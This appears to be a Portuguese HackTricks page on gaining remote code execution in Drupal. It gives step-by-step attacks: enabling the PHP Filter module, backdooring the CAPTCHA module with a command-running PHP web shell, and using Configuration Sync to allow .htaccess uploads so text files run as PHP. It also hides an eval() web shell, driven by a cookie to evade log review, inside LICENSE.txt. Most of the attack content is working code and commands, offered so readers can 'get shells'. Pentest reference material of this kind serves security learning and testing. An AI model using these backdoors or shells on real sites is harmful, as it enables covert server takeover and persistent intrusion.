12 KiB
Drupal RCE
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.
Com o Módulo PHP Filter
{% hint style="warning" %}
Nas versões mais antigas do Drupal (antes da versão 8), era possível fazer login como administrador e ativar o módulo PHP filter, que "Permite que trechos de código/snippets PHP embutidos sejam avaliados." Mas a partir da versão 8, este módulo não está instalado por padrão.
{% endhint %}
Você precisa que o plugin php esteja instalado (verifique acessando /modules/php e se retornar um 403 então, existe, se não encontrado, então o plugin php não está instalado)
Vá para Módulos -> (Marque) PHP Filter -> Salvar configuração
Em seguida, clique em Adicionar conteúdo -> Selecione Página Básica ou Artigo -> Escreva código shell php no corpo -> Selecione Código PHP em Formato de texto -> Selecione Visualizar
Finalmente, acesse o nó recém-criado:
curl http://drupal-site.local/node/3
Instalar o Módulo Filtro PHP
{% hint style="warning" %} Nas versões atuais, não é mais possível instalar plugins tendo apenas acesso à web após a instalação padrão. {% endhint %}
A partir da versão 8 em diante, o módulo PHP Filter não é mais instalado por padrão. Para aproveitar essa funcionalidade, teríamos que instalar o módulo por conta própria.
- Baixe a versão mais recente do módulo no site do Drupal.
- wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
- Após o download, vá para
Administração>Relatórios>Atualizações disponíveis. - Clique em
Procurar, selecione o arquivo no diretório em que o baixamos e clique emInstalar. - Depois que o módulo estiver instalado, podemos clicar em
Conteúdoe criar uma nova página básica, semelhante ao que fizemos no exemplo do Drupal 7. Novamente, certifique-se de selecionarCódigo PHPno menu suspensoFormato de texto.
Módulo com Backdoor
{% hint style="warning" %} Nas versões atuais, não é mais possível instalar plugins tendo apenas acesso à web após a instalação padrão. {% endhint %}
Um módulo com backdoor pode ser criado adicionando um shell a um módulo existente. Os módulos podem ser encontrados no site drupal.org. Vamos escolher um módulo como o CAPTCHA. Role para baixo e copie o link para o arquivo tar.gz arquivo.
- Baixe o arquivo e extraia seu conteúdo.
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
- Criar um shell web PHP com o conteúdo:
<?php
system($_GET["cmd"]);
?>
- Em seguida, precisamos criar um arquivo
.htaccesspara nos dar acesso à pasta. Isso é necessário, pois o Drupal nega acesso direto à pasta/modules.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
- A configuração acima aplicará regras para a pasta / quando solicitarmos um arquivo em /modules. Copie ambos esses arquivos para a pasta captcha e crie um arquivo compactado.
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
- Assumindo que temos acesso administrativo ao site, clique em
Gerenciare depois emEstenderna barra lateral. Em seguida, clique no botão+ Instalar novo módulo, e seremos levados para a página de instalação, comohttp://drupal-site.local/admin/modules/install. Navegue até o arquivo backdoored Captcha e clique emInstalar. - Após a instalação bem-sucedida, navegue para
/modules/captcha/shell.phppara executar comandos.
Backdooring Drupal com Sincronização de Configuração
Post compartilhado por Coiffeur0x90
Parte 1 (ativação de Mídia e Biblioteca de Mídia)
No menu Estender (/admin/modules), você pode ativar o que parecem ser plugins já instalados. Por padrão, os plugins Mídia e Biblioteca de Mídia não parecem estar ativados, então vamos ativá-los.
Antes da ativação:
Após a ativação:
Parte 2 (alavancando o recurso Sincronização de Configuração)
Vamos aproveitar o recurso Sincronização de Configuração para despejar (exportar) e carregar (importar) entradas de configuração do Drupal:
- /admin/config/development/configuration/single/export
- /admin/config/development/configuration/single/import
Patching system.file.yml
Vamos começar aplicando o patch na primeira entrada allow_insecure_uploads de:
Arquivo: system.file.yml
...
allow_insecure_uploads: false
...
Para:
Arquivo: system.file.yml
...
allow_insecure_uploads: true
...
Patch campo field.field.media.document.field_media_document.yml
Em seguida, corrija a segunda entrada file_extensions de:
Arquivo: field.field.media.document.field_media_document.yml
...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...
Para:
Arquivo: field.field.media.document.field_media_document.yml
...
file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'
...
Não o utilizo neste post do blog, mas é importante notar que é possível definir a entrada
file_directoryde forma arbitrária e que ela é vulnerável a um ataque de travessia de caminho (assim podemos voltar dentro da árvore do sistema de arquivos do Drupal).
Parte 3 (alavancando o recurso Adicionar Documento)
O último passo é o mais simples e é dividido em dois subpassos. O primeiro é fazer o upload de um arquivo no formato .htaccess para alavancar as diretivas do Apache e permitir que arquivos .txt sejam interpretados pelo motor PHP. O segundo é fazer o upload de um arquivo .txt contendo nosso payload.
Arquivo: .htaccess
<Files *>
SetHandler application/x-httpd-php
</Files>
# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>
Por que esse truque é legal?
Porque uma vez que o Webshell (que chamaremos de LICENSE.txt) é colocado no servidor Web, podemos transmitir nossos comandos via $_COOKIE e nos logs do servidor Web, isso aparecerá como uma solicitação GET legítima para um arquivo de texto.
Por que nomear nosso Webshell de LICENSE.txt?
Simplesmente porque se pegarmos o seguinte arquivo, por exemplo core/LICENSE.txt (que já está presente no núcleo do Drupal), temos um arquivo de 339 linhas e 17,6 KB de tamanho, o que é perfeito para adicionar um pequeno trecho de código PHP no meio (já que o arquivo é grande o suficiente).
Arquivo: LICENSE.txt Patcheado
...
this License, you may choose any version ever published by the Free Software
Foundation.
<?php
# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}
?>
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
...
Parte 3.1 (upload do arquivo .htaccess)
Primeiro, aproveitamos o recurso Adicionar Documento (/media/add/document) para fazer upload do nosso arquivo contendo as diretivas do Apache (.htaccess).
Parte 3.2 (upload do arquivo LICENSE.txt)
Em seguida, aproveitamos novamente o recurso Adicionar Documento (/media/add/document) para fazer upload de um Webshell oculto dentro de um arquivo de licença.
Parte 4 (interação com o Webshell)
A última parte consiste em interagir com o Webshell.
Como mostrado na captura de tela a seguir, se o cookie esperado pelo nosso Webshell não estiver definido, obtemos o resultado subsequente ao consultar o arquivo via um navegador da Web.
Quando o atacante define o cookie, ele pode interagir com o Webshell e executar os comandos que desejar.
E, como você pode ver nos logs, parece que apenas um arquivo txt foi solicitado.
Obrigado por dedicar seu tempo para ler este artigo, espero que ajude você a obter alguns shells.